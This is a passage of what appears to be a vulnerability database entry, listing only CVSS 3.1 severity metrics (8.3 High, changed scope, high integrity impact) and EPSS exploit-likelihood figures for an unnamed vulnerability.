NONE
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
HIGH
Availability Impact
LOW
CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:L
8.3 High
AI Score
Confidence
Low
0.0004 Low
EPSS
Percentile
9.1%